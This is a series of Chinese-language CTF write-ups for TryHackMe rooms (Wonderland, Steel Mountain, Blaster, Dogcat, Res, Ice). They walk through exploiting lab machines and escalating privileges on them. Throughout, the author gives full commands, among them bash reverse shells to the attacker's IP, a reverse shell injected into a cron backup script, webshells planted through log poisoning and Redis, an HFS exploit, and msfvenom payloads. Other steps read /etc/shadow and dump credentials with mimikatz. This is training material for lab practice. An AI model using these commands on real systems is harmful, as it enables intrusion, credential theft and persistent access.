sudo dpkg -i rustscan_2.0.1_amd64.deb``rustscan -a 10.10.166.15-
開 22 跟 80

網址

http://10.10.166.15/透過 dirsearch 可以找到/rhttp://10.10.166.15/r/ 再掃，可以掃到- /a
感覺每次都是一個字，所以可以爆搜看看，自己寫一個 python 腳本- import requests from multiprocessing import Pool url = 'http://10.10.166.15/r/a/' alphabat = 'abcdefghijklmnopqrstuvwxyz' def req(i): res = requests.get(f'{url}/{i}') if res.status_code == 200: print(i) p = Pool(10) p.map(req,alphabat)
如果爆到正確的就會 print 出來，然後手動把搜的結果加去 url 最後面再爆所以最後爆出的結果是r/a/b/b/i/thttp://10.10.166.15/r/a/b/b/i/t/-
觀察原始碼會發現一串奇怪的字串alice:HowDothTheLittleCrocodileImproveHisShiningTail
斷詞後發現是 How Doth The Little Crocodile Improve His Shining Tail
來自於How Doth the Little Crocodile
路易斯·卡羅創作的詩How doth the little crocodile Improve his shining tail And pour the waters of the Nile On every golden scale! How cheerfully he seems to grin How neatly spreads his claws, And welcomes little fishes in With gently smiling jaws!好…完全不重要

SSH

通靈一下，我們時常會把帳號跟密碼用 : 隔開說不定，上面那串就是 alice 的密碼！嘗試ssh登入看看ssh alice@10.10.166.15密碼 HowDothTheLittleCrocodileImproveHisShiningTail到處找了一輪，都找不到 user.txt QAQ- 算了，我們直接想辦法提權，等有 root 後再用上帝視角來搜!
但反而我們使用者alice的家目錄有一個沒有權限讀的 root.txt
輸入 sudo -l 觀察-
發現我們可以用 rabbit 使用者身分執行 /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
所以執行方法應該如下 sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

挾持 Python

觀察 walrus_and_the_carpenter.py發現內部的程式碼會 import random
這個時候我們可以透過一些小技巧挾持他的 randomPython 的 import 有一個特性- 首先他會讀取同一個資料夾裡面，是否有相同檔名的檔案來給他 Import
再來才會去找 sys.path 裡面的東西可以輸入 python3 -c "import sys; print(sys.path)" 觀察所以由於該檔案在我們家目錄，我們可以在自己家目錄下創一個 random.py- 此時如果執行該 python 檔案，即可使用我們自己的 random
我們建造的 random.py``python3 import pty pty.spawn("/bin/bash")
以 rabbit 使用者執行看看sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
就會發現我們噴成 rabbit 的 shell 了!

逆向工程

進入 rabbit 後，發現他的家目錄有一個 teaParty 的檔案透過 file teaParty 檢查會發現他是一個 ELF 執行檔透過 ls -al teaParty 會發現他有 SUID- 那不管了，我們先執行看看ㄅ!- ./teaParty
噴了一些字，還有當前時間就卡住了，感覺可以讓我輸入一些字，那就先隨便輸入個 meow 看看ㄅ
哇…… 噴出了 Segmentation fault (core dumped)
母…母湯阿，不會在這邊要開始打 pwn 了吧 QWQ好吧，那我們先把檔案抓出來分析看看- cp teaParty /tmp
chmod 777 /tmp/teaParty
本機scp alice@10.10.166.15:/tmp/teaParty .透過 Cutter 打開-
觀察 main 函數會發現，先會 set uid 跟 gid 為 0x3eb = 1003
先觀察一下 uid、gid 1003 是誰cat /etc/passwd | grep 1003
會發現是一個叫做 hatter 的使用者關於逆向這個程式，很明顯的重點就是以下三行- setuid(0x3eb);
setgid(0x3eb);
system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R");
然後他的 Segmentation fault 是假的7777777777777777777我們可以發現他的 system 裡面主要 call 了兩個東西- 第一個是 /bin/echo
第二個是 date
在這邊我先查詢了 /bin/echo 以及 /bin/date 發現都不可以修改想到我們可以做什麼事情了嗎?- 程式裡面的 system 呼叫的是 date 而不是 /bin/date
而在 Linux 中，如果不寫完整的路徑，就會去$PATH裡面抓
所以我們可以修改 $PATH ，增加路徑，並放上我們自己ㄉ date 檔案放一個 reverse shell/bin/bash -c '/bin/bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'再給他權限- chmod +x date攻擊機準備好 reverse shell- nc -vlk 7877再輸入以下指令- PATH=/home/rabbit:$PATH ./teaParty就可以收到 reverse shell 了!!-
我們目前到了 hatter 使用者
在根目錄可以發現一組 WhyIsARavenLikeAWritingDesk? 密碼，可以以此用 ssh 登入 hatter
ssh hatter@10.10.166.15

提權

先透過 scp 把 linpeas 給傳到機器中輸入 bash linpeas.sh- 發現一些有趣的東西在 Capabilities 的地方可以看到- Files with capabilities
發現 perl 有 cap_setuid
去 GTFObins 上找就找到了 GTFObins 上面的 perl Capabilities- perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
就發現了我們拿到 root !!也就順利的拿到了 root 的 flag-
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}到 /root 看看有什麼東西-
找到了 user.txt``thm{"Curiouser and curiouser!"}
~~把user.txt放在root目錄是不是搞錯了什麼~~

Steel Mountain (Try Hack Me Writeup)

Thu, 05 Aug 2021 13:24:00 +0800

URL : https://tryhackme.com/room/steelmountain

IP : 10.10.27.172

Scan

rustscan -a 10.10.27.172
nmap -A 10.10.27.172

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:58 EDT
Nmap scan report for 10.10.27.172
Host is up (0.27s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2021-08-04T05:45:04
|_Not valid after: 2022-02-03T05:45:04
|_ssl-date: 2021-08-05T05:59:31+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open unknown
49156/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:5d:12:51:16:37 (unknown)
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-05T05:59:18
|_ start_date: 2021-08-05T05:44:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.76 seconds

觀察首頁http://10.10.27.172/
有一個 Employee of the month圖片網址 http://10.10.27.172/img/BillHarper.pngWho is the employee of the month?- Bill HarperScan the machine with nmap. What is the other port running a web server on?- 8080Take a look at the other web server. What file server is running?- 透過 NMAP 可以發現 HttpFileServer
公司叫做 rejetto
所以答案 Rejetto Http File ServerHFS 的版本 2.3 可以找到有一個CVE- https://www.exploit-db.com/exploits/39161
CVE-2014-6287

Exploit

下載檔案到 kaliwget https://www.exploit-db.com/download/39161 -O 39161.py
修改內部的 ip 及 port
ip_addr = "10.13.21.55"
local_port = "7878"這邊的 port 是指 reverse shell 的port另外依照 exploit 需求，需要在攻擊機 80 port 開一個 webserver，並在根目錄放一個 nc.exe- nc.exe 可以從這邊取得https://github.com/int0x33/nc.exe/blob/master/nc.exesudo python3 -m http.server 80- 使用 python 開啟 80 port 的 webserver並於本地端開啟 nc 監聽- nc -l 7877執行 exploit- python 39161.py 10.10.27.172 8080
就可以收到 shell ㄌ!-
使用 whoami 確認使用者名稱在使用者的桌面找到 user flag-
b04763b6fcf51fcd7c13abc7db4fd365

觀察提權資訊

輸入 systeminfo 可以觀察到Microsoft Windows Server 2012 R2 Datacenter
下載 WinPeas.exe 進行掃描- powershell -c wget http://10.13.21.55:8000/winPEASx64.exe -outFile winPEASx64.exe執行 Winpeas 發現有可疑ㄉ引號路徑漏洞- 觀察 Services- 可以輸入 powershell -c Get-Service 觀察目前的所有 Services
WinPeas 也已經很好心的告訴我們是 AdvancedSystemCareService9 了確認檔案與 Services 的權限- 先準備 https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk 在攻擊機
powershell -c wget http://10.13.21.55:8000/accesschk.exe -outFile accesschk.exe觀察 Services 權限- accesschk.exe /accepteula -ucqv AdvancedSystemCareService9
可以發現我們的使用者 bill
可以幫 servicesStart
Stop觀察檔案權限- accesschk -uwdq "C:\Program Files (x86)\"可以看到我們沒有權限
accesschk -uwdq "C:\Program Files (x86)\IoBit-
發現我們有 RW 權限!!透過 msfevon 產出一個 reverse shell- msfevon -p windows/x64_shell_reverse_tcp LHOST=10.13.21.55 LPORT=8877 -f exe -a Advanced.exe下載檔案並放置到 C:\Program Files (x86)- powershell -c wget http://10.13.21.55:8000/Advanced.exe -outFile Advanced.exe
準備 reverse shell 監聽nc -vlk 8877觀察 services- sc qc AdvancedSystemCareService9qc : Query system config停止 services- sc stop AdvancedSystemCareService9
重啟 services- sc start AdvancedSystemCareService9
會發現畫面卡住，因為我們的 reverse sehll 已經接上了!!
取得 root flag-
9af5f314f57607c00fd09803a587db80

Blaster (Try Hack Me Writeup)

Wed, 04 Aug 2021 23:52:00 +0800

URL : https://tryhackme.com/room/blaster

IP: 10.10.188.122

先寫在前面，這一題初學者不建議打，官方的影片跟 Writeup 都不完全適用，可能是作者重新 Deploy 過題目或是做過一些升級，所以整題難度高了非常多 QQ

Recon

老梗 nmap -A 10.10.188.122
發現有開兩個 port80
3389How many ports are open on our target system?- 2Looks like there’s a web server running, what is the title of the page we discover when browsing to it?- nmap 就告訴我們ㄌ
IIS Windows ServerInteresting, let’s see if there’s anything else on this web server by fuzzing it. What hidden directory do we discover?- 預設的 dirsearch 找不到東西這邊我用了 dirb 的 big Wordlist- python3 dirsearch.py -u http://10.10.188.122 -e all -w /usr/share/dirb/wordlists/big.txt
掃到ㄌ http://10.10.188.122/retro/透過 Wappalyzer 可以觀察到-
他是一個 WordpressNavigate to our discovered hidden directory, what potential username do we discover?- Po 文者都是 WadeCrawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?- 發現一篇文章Ready Player One I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!
他說他最喜歡的書是 Ready Player One (一級玩家)
他的名字跟主角很像，主角是 Wade Owen Watts
然後他說他常常在登入時打錯他的 avatar抱歉我英文不好，查了之後才知道avatar : （網路遊戲或網路聊天室中的）虛擬化身
所以應該是電影裡面的角色名稱在這邊查詢 https://hero.fandom.com/wiki/Parzival_(Ready_Player_One)- 可以找到 Wade Owen Watts, under the virtual name Parzival所以他的密碼是 parzival- 大小寫都 try 了一次，發現是全小寫

RDP

透過 RDP 登入遠端系統xfreerdp +drives /u:Wade /v:10.10.151.248:3389
使用密碼 parzival
即可順利登入取得 user flag- THM{HACK_PLAYER_ONE}
開始工具列搜尋 system infomation-
可以看到作業系統的版本等資訊嘗試使用 winPEAS 來搜可以提權的點- powershell wget http://10.13.21.55:8000/winPEAS.bat -outfile winPEAS.bat
有 Defender 把我吃掉ㄌ QQQQ這邊依照官方的Writeup 以及教學，理論上可以在 IE 的瀏覽紀錄上找到一些蛛絲馬跡-
但我這邊看到基本上是空的QQQQ
好吧，那就當作這題是困難版的，繼續嘗試

可疑的檔案

在桌面上找到 hhupd.exe直接丟去 Google 就會看到- CVE-2019-1388 提權When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?- 完成正規解可以在瀏覽器蛛絲馬跡上找到的答案QQ
CVE-2019-1388Looks like an executable file is necessary for exploitation of this vulnerability and the user didn’t really clean up very well after testing it. What is the name of this executable?- 桌面上的檔案 hhupd透過觀察網路上的資源- https://github.com/jas502n/CVE-2019-1388
可以發現 CVE-2019-1388 是一個很酷ㄉ洞，基本實作細節如下1. 對著 hhupd 點兩下

跳出 UAC 後，選 show more details-
選擇 Show infomation about the publisher's certificate-
點選 Issued by: 後面的超連結-
這個時候畫面還是顯示憑證資訊，我們可以按 OK 先關掉
再按 No 關閉 UAC
這個時候出現的 IE，而這個IE就是以 system 權限跑起來的-
我們可以按下 ctrl + s 把網頁存檔，目的主要是為了叫出存檔的框框
這個時候會跳出一個錯誤，不重要，直接按下 OK-
在上方路徑處輸入 cmd 或 C:\Windows\System32\cmd.exe 並按下 Enter-
會跳出一個 cmd 框框，而且是用 system 權限執行起來的-

提權完成Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?- nt authority\system接下來就可以到 admin 資料夾的桌面領 root flag ㄌ- Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!- THM{COIN_OPERATED_EXPLOITATION}

Dogcat (Try Hack Me Writeup)

Mon, 02 Aug 2021 23:59:00 +0800

URL : https://tryhackme.com/room/dogcat

IP: 10.10.221.153
第一次打 Medium 的題目

Recon

先用老梗 nmap -A 10.10.221.153發現只有開 80 跟 22dirsearch- 發現基本上都沒有東西 QQ

瀏覽器亂逛

http://10.10.221.153/
會發現可以選狗勾或貓貓選貓貓會出現
網址是 http://10.10.221.153/?view=cat選狗勾- 網址是 http://10.10.221.153/?view=dog
~~不要問我為什麼不幫狗勾截圖~~嘗試 LFI- 這邊可以套一個 php 的 LFI 老梗 PHP Wrapperhttp://10.10.221.153/?view=php://filter/convert.base64-encode/resource=cat
可以發現成功噴出了一堆 base64PGltZyBzcmM9ImNhdHMvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K
解碼後發現是 .jpg" />
而同理解碼狗勾是 .jpg" />繞狗勾- 假設我們想要看 /etc/passwd``http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=/etc/passwd
他會說 Sorry, only dogs or cats are allowed.而如果我們輸入 /etc/passwddog- 他會回傳 Here you go! 但是噴一些錯誤
因為找不到檔案，所以錯誤很合理那我們嘗試亂寫奇怪的路徑看看- http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=./dog/../dog
會發現可以成功開啟狗勾嘗試觀察 index.php 內容這邊只截錄重點

可以發現參數 ext 很重要我們可以透過給予 ext 空白繞過副檔名任意 LFI- http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../index.php
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/passwd
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/apache2/apache2.conf
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../var/log/apache2/access.log可以發現 access.log 可讀
可以透過 access.log 來做到 LFI 2 RCELFI 2 RCE- 如果在瀏覽器輸入這個10.10.221.153?A=在 log 上會變成這樣- /?A=%3C?php%20phpinfo();%20?%3C/php%3E
主要是因為 HTTP 會做到 URL Encode所以可以用 nc- nc 10.10.221.153 80
GET /MEOW?
成功!寫入 webshell- nc 10.10.221.153 80
GET /MEOW?
http://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=curl%20-o%20/tmp/s%20http://10.13.21.55:8000/s載入 reverse shell
在這邊發現這台電腦沒有 wget，所以用 curlhttp://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=bash%20/tmp/s- 執行 reverse shell
本地 nc -vlk 7877
就可以順利接到 Shell ㄌ!

Shell

在/var/www/flag.php可以找到 flag1
在 /var/www/flag.php- 可以找到 flag2
嘗試提權- 輸入 sudo -l 可以發現我們可以用 root 來 run /usr/bin/env
這邊有兩種用法/usr/bin/env ls /root就可以用 roo 來 ls /root也可以參考 gtfobins- 有 suid 的 env
env /usr/bin/sh -p取得 root flag (flag3)- THM{D1ff3r3nt_3nv1ronments_874112}

Docker 提權

不管了，先老梗的 linpeas 下去curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh
/usr/bin/env /tmp/linpeas.sh
可以發現根目錄有 /.dockerenv
確定目前我們在docker中發現備份檔案-
發現有 backup.tar 跟 backup.sh
試著把檔案複製到 /var/www/html 來準備下載下載並觀察備份檔案- wget http://10.10.221.153/backup.tar
tar xf backup.tar觀察 Docker File- 發現沒什麼特別
但也發現為什麼 access log 一直有噴一個 127.0.0.1 的 curl觀察 launch.sh-
發現重點!!
他把 /opt/backup 掛載到本地的/root/container/backup所以我在 /opt/backup 寫資料會跑到本地端那問題就只剩下，我們怎麼讓本地執行觀察 backup.sh- 發現裡面就 tar cf /root/container/backup/backup.tar /root/container
但……本地端是怎麼執行的ㄋ??
突然發現上面的 backup.tar 就剛好是當前時間!所以可以推測說在遠端有一個 cron job寫入 backup.sh- 戳一個 reverse shellecho "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> backup.sh
本地端開 nc -vlk 7878- 拿到本地 root shell! (flag4)- THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}

Res (Try Hack Me Writeup)

Sun, 01 Aug 2021 13:13:00 +0800

URL : https://tryhackme.com/room/res

IP : 10.10.149.195

Recon

先來老梗的 nmap -A 10.10.149.195``Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 01:29 EDT Nmap scan report for 10.10.149.195 Host is up (0.29s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works ![](https://i.imgur.com/3PG5lnw.png)``python3 dirsearch.py -u http://10.10.149.195/ -e all- 發現完全沒東西Scan the machine, how many ports are open?- 理論上要掃全部的 port
nmap -p- 10.10.149.195雖然很有效果，但很浪費時間 QQ
掃ㄌ將近 20 分鐘QQ因為喵到下面說 port 是 ****- 所以我猜測是 1000~9999
nmap -p 1000-9999 10.10.149.195
答案 6379~其實這題題目跟 logo 就很明顯ㄌ~~Scan the machine, how many ports are open?- 2 個 port
80 與 6379What’s is the database management system installed on the server?- 6379 是 redisWhat port is the database management system running on?- 6379What’s is the version of management system installed on the server?- nmap -p6379 -A 10.10.149.195
可以看到是 6.0.7
嘗試 Google 過，找不到這個版本的 Exploit
找不到 exploit

寫入 shell

使用 redis cli 連上redis-cli -h 10.10.149.195進行連線config set dir "/var/www/html"``config set dbfilename meow.php``set x "\r\n\r\n\r\n\r\n"``save成功寫入 phpinfo寫入 web shell- config set dbfilename shell.php
set x "\r\n\r\n\r\n\r\n"
save
成功寫入 webshell 且可以使用 ls上傳 reverse shell- 本地端準備bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
存在 s 檔案中
並使用 python3 -m http.server 開啟網頁伺服器http://10.10.149.195/shell.php?A=wget 10.13.21.55:8000/s -O /tmp/s- 把檔案存下來http://10.10.149.195/shell.php?A=cat%20/tmp/s-
確認寫入正常執行 reverse shell- 本地端準備 nc -vlk 7877
訪問 http://10.10.149.195/shell.php?A=bash%20/tmp/s
成功接上 reverse shell本地亂逛- python -c 'import pty; pty.spawn("/bin/bash")'互動式 bash尋找 user flag- 檔案在 /home/vianka/user.txt
thm{red1s_rce_w1thout_credent1als}

提權

Linpeaswget 10.13.21.55:8000/linpeas.sh下載 linpeasbash linpeas.sh | tee out.txt- 執行發現有標顏色的 suid-
xxdsuid xxd 提權- gtfobins 找到 suid xxd 讀檔https://gtfobins.github.io/gtfobins/xxd/#suid要破解密碼的話可以破 /etc/shadow 的 hash- LFILE=/etc/shadow
xxd "$LFILE" | xxd -r可以順利回傳 /etc/shadow-
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::爆破密碼- 複製 vianka 的 hash 到本地端
呼叫約翰john j.txt --wordlist=/opt/rockyou.txt
成功破解密碼為 beautiful1切換使用者- su vianka切換使用者，並切換密碼為 beautiful1確認權限- 輸入 sudo -l
發現使用者可以用 sudo使用 sudo su 切換到 root成功取得 root flag-

Ice (Try Hack Me Writeup)

Sat, 31 Jul 2021 23:59:00 +0800

URL: https://tryhackme.com/room/ice

Recon

題目建議使用 SYN Scanhttps://nmap.org/book/synscan.html
可以發現指令是 -sS
sudo nmap -sS 10.10.209.59需要 root 權限所以 sudo

└─$ sudo nmap -sS 10.10.209.59
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-31 08:58 EDT
Nmap scan report for 10.10.209.59
Host is up (0.27s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
8000/tcp open http-alt
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown

不管，還是run一次習慣的 -A 看看

sudo nmap -A 10.10.209.59
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-31 09:00 EDT
Stats: 0:01:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 09:02 (0:00:00 remaining)
Nmap scan report for 10.10.209.59
Host is up (0.28s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2021-07-30T12:49:58
|_Not valid after: 2022-01-29T12:49:58
|_ssl-date: 2021-07-31T13:02:27+00:00; 0s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/31%OT=135%CT=1%CU=30419%PV=Y%DS=4%DC=T%G=Y%TM=610549
OS:E3%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M
OS:506NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)

Network Distance: 4 hops
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: , NetBIOS MAC: 02:bd:72:1c:16:7b (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-31T08:02:13-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-31T13:02:13
|_ start_date: 2021-07-31T12:49:56

TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 139.52 ms 10.13.0.1
2 ... 3
4 283.86 ms 10.10.209.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.04 seconds

Once the scan completes, we’ll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?一堆字，題目不會講重點ㄇ…他問 RDP 是什麼 Port
3389What service did nmap identify as running on port 8000? (First word of this service)- 用 -A 的 nmap 可以看出
他是 IcecastWhat does Nmap identify as the hostname of the machine? (All caps for the answer)- 一樣是 -A 的 nmap 有寫到 Host:
DARK-PC

Gain Access

Now that we’ve identified some interesting services running on our target machine, let’s do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.我們知道他是 Icecast 就可以找到他的弱點
不過我是直接 Google Icecast RCE~~我覺得 cvedetails 的搜尋很難用~~https://www.cvedetails.com/cve/CVE-2004-1561/題目問說 Type- 所以是 Execute Code OverflowWhat is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000- CVE-2004-156After Metasploit has started, let’s search for our target exploit using the command ‘search icecast’. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in ‘RP: Metasploit’ which is recommended to be completed prior to this room, although not entirely necessary.- 開啟 msfmsfconsole輸入 search icecast 尋找 icecast 相關攻擊 module- 可以找到 module 為- exploit/windows/http/icecast_header準備 Exploit- 輸入 use 0 或 use exploit/windows/http/icecast_header
輸入 show options
可以看到我們需要輸入的參數RHOSTS
LHOSTset RHOSTS 10.10.209.59``set LHOSTS 10.13.21.55輸入 exploit

Escalate

Woohoo! We’ve gained a foothold into our victim machine! What’s the name of the shell we have now?
他自動彈回了一個 meterpreter 的 shellWhat user was running that Icecast process? The commands used in this question and the next few are taken directly from the ‘RP: Metasploit’ room.- 輸入 ps 可以看到所有的 process
而如上圖，Icecast2.exe 使用者為 DARKWhat build of Windows is the system?- 偵察系統版本有助於後續的工作
可以輸入 sysinfo 觀察
7601Now that we know some of the finer details of the system we are working with, let’s start escalating our privileges. First, what is the architecture of the process we’re running?- 如上的 sysinfo ，可以看到架構是 x64Now that we know the architecture of the process, let’s perform some further recon. While this doesn’t work the best on x64 machines, let’s now run the following command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete- 接下來我們要使用 meterpreter 的自動 exploit 推薦器來做自動化測試
run post/multi/recon/local_exploit_suggester
Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?- 第一個回傳的是 exploit/windows/local/bypassuac_eventvwr按下鍵盤 ctrl + z 先把 meterpreter session 丟去背景- 準備來下 explit 指令
輸入 use exploit/windows/local/bypassuac_eventvwr輸入 show options- 確認目前的 session ID-
ID 為 1設定相關參數- set session 1
set LHOSTS 10.13.21.55輸入 run 開始執行- We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?- 輸入 getprivs 可以看到我們的權限
他說要可以 take ownership of files
所以是 SeTakeOwnershipPrivilege

Looting

Mentioned within this question is the term ’living in’ a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.他說要找印表機相關的程式
先下 ps 觀察 processes透過 Google 可以發現是 spoolsv.exe- 他的 pid 是 1300輸入 getuid 觀察目前我們是什麼使用者- 輸入 migrate 1300- 把自己的 process 搬移到 pid 1300 上面
Let’s check what user we are now with the command getuid. What user is listed?- 再輸入一次 getuid
會發現我們變成 NT AUTHORITY\SYSTEM 權限!輸入 load kiwi 載入 mimikatz- 輸入 help 觀察 mimikatz 使用方法- Which command allows up to retrieve all credentials?- creds_all
Run this command now. What is Dark’s password? Mimikatz allows us to steal this password out of memory even without the user ‘Dark’ logged in as there is a scheduled task that runs the Icecast as the user ‘Dark’. It also helps that Windows Defender isn’t running on the box ;) (Take a look again at the ps list, this box isn’t in the best shape with both the firewall and defender disabled)- 上面就有寫到 Dark 的密碼為 Password01!

Post-Exploitation

What command allows us to dump all of the password hashes stored on the system? We won’t crack the Administrative password in this case as it’s pretty strong (this is intentional to avoid password spraying attempts)輸入 hashdump 可以 dump 出所有的密碼 hash
其實我們在這邊也可以複製 Dark 的 hash 然後用 John 爆爆看john hash.txt --wordlist=/opt/rockyou.txt --format=NT
